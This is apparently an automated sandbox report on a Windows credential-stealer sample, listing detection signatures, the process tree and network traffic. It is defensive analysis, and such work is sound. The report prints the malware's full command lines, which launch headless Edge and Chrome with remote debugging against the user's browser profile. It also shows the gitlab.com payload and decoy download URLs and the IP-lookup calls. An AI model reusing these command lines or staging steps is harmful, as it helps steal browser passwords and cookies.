Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U2800.exe

Overview

General Information

Sample name:#U2800.exe
renamed because original name is a hash value
Original sample name:.exe
Analysis ID:1590648
MD5:95c636b47af9e07f311f711c5328aeb8
SHA1:f7a8813526b1a4db89c1500bb404ce60815f7693
SHA256:2660a4d5ea4ef545d592d52b6f6bb5324de87e589d764ff6117271153835f0fd
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected Telegram Recon
AI detected suspicious sample
Drops password protected ZIP file
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • #U2800.exe (PID: 6944 cmdline: "C:\Users\user\Desktop\#U2800.exe" MD5: 95C636B47AF9E07F311F711C5328AEB8)
    • msedge.exe (PID: 7116 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 4192 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1496 --field-trial-handle=1412,i,1880480402354006827,1683441286412184854,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • chrome.exe (PID: 7164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9940 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1588 --field-trial-handle=1420,i,14764490756503719994,12081713537846104491,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • WINWORD.EXE (PID: 7472 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
#U2800.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: #U2800.exe PID: 6944JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\#U2800.exe", ParentImage: C:\Users\user\Desktop\#U2800.exe, ParentProcessId: 6944, ParentProcessName: #U2800.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-si
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\#U2800.exe", ParentImage: C:\Users\user\Desktop\#U2800.exe, ParentProcessId: 6944, ParentProcessName: #U2800.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-si
      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\#U2800.exe", ParentImage: C:\Users\user\Desktop\#U2800.exe, ParentProcessId: 6944, ParentProcessName: #U2800.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-si
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-14T12:40:01.054855+010028033053Unknown Traffic192.168.2.449742172.65.251.78443TCP
      2025-01-14T12:40:01.263628+010028033053Unknown Traffic192.168.2.449739142.250.185.206443TCP
      2025-01-14T12:40:01.280963+010028033053Unknown Traffic192.168.2.449741142.250.185.206443TCP
      2025-01-14T12:40:01.284133+010028033053Unknown Traffic192.168.2.449732142.250.185.206443TCP
      2025-01-14T12:40:01.286112+010028033053Unknown Traffic192.168.2.449740142.250.185.206443TCP
      2025-01-14T12:40:01.288579+010028033053Unknown Traffic192.168.2.449738142.250.185.206443TCP
      2025-01-14T12:40:01.293305+010028033053Unknown Traffic192.168.2.449737142.250.185.206443TCP
      2025-01-14T12:40:01.293535+010028033053Unknown Traffic192.168.2.449736142.250.185.206443TCP
      2025-01-14T12:40:01.295847+010028033053Unknown Traffic192.168.2.449733142.250.185.206443TCP
      2025-01-14T12:40:01.301509+010028033053Unknown Traffic192.168.2.449734142.250.185.206443TCP
      2025-01-14T12:40:01.375760+010028033053Unknown Traffic192.168.2.449735142.250.185.206443TCP
      2025-01-14T12:40:02.535671+010028033053Unknown Traffic192.168.2.449745142.250.185.228443TCP
      2025-01-14T12:40:02.539462+010028033053Unknown Traffic192.168.2.449751142.250.185.228443TCP
      2025-01-14T12:40:02.542789+010028033053Unknown Traffic192.168.2.449747142.250.185.228443TCP
      2025-01-14T12:40:02.547019+010028033053Unknown Traffic192.168.2.449749142.250.185.228443TCP
      2025-01-14T12:40:02.548217+010028033053Unknown Traffic192.168.2.449750142.250.185.228443TCP
      2025-01-14T12:40:02.550244+010028033053Unknown Traffic192.168.2.449754142.250.185.228443TCP
      2025-01-14T12:40:02.550938+010028033053Unknown Traffic192.168.2.449746142.250.185.228443TCP
      2025-01-14T12:40:02.552046+010028033053Unknown Traffic192.168.2.449752142.250.185.228443TCP
      2025-01-14T12:40:02.554431+010028033053Unknown Traffic192.168.2.449753142.250.185.228443TCP
      2025-01-14T12:40:02.561725+010028033053Unknown Traffic192.168.2.449748142.250.185.228443TCP
      2025-01-14T12:40:25.481973+010028033053Unknown Traffic192.168.2.449778172.65.251.78443TCP
      2025-01-14T12:40:27.816717+010028033053Unknown Traffic192.168.2.449779104.26.13.205443TCP
      2025-01-14T12:40:28.422174+010028033053Unknown Traffic192.168.2.449780104.26.13.205443TCP
      2025-01-14T12:40:28.896545+010028033053Unknown Traffic192.168.2.449781208.95.112.180TCP
      2025-01-14T12:40:29.564551+010028033053Unknown Traffic192.168.2.449782104.26.13.205443TCP
      2025-01-14T12:40:30.197055+010028033053Unknown Traffic192.168.2.449783104.26.13.205443TCP
      2025-01-14T12:40:30.660328+010028033053Unknown Traffic192.168.2.449784208.95.112.180TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 80.3% probability
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49779 version: TLS 1.2
      Source: #U2800.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256r source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: #U2800.exe
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: #U2800.exe
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: #U2800.exe
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: #U2800.exe
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256@ source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.Diagnostics.Process.ni.pdb source: #U2800.exe
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdbSHA256 source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdb source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\AnhXi\Downloads\Telegram Desktop\Projects\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: #U2800.exe
      Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: #U2800.exe, 00000000.00000002.1977175799.0000023427C9A000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmp, e_sqlite3.dll.0.dr
      Source: Binary string: System.IO.Compression.ni.pdb source: #U2800.exe
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: #U2800.exe
      Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
      Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49784 -> 208.95.112.1:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49781 -> 208.95.112.1:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 142.250.185.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 142.250.185.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 142.250.185.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 142.250.185.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 142.250.185.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 142.250.185.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 142.250.185.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 172.65.251.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 142.250.185.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 142.250.185.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49778 -> 172.65.251.78:443
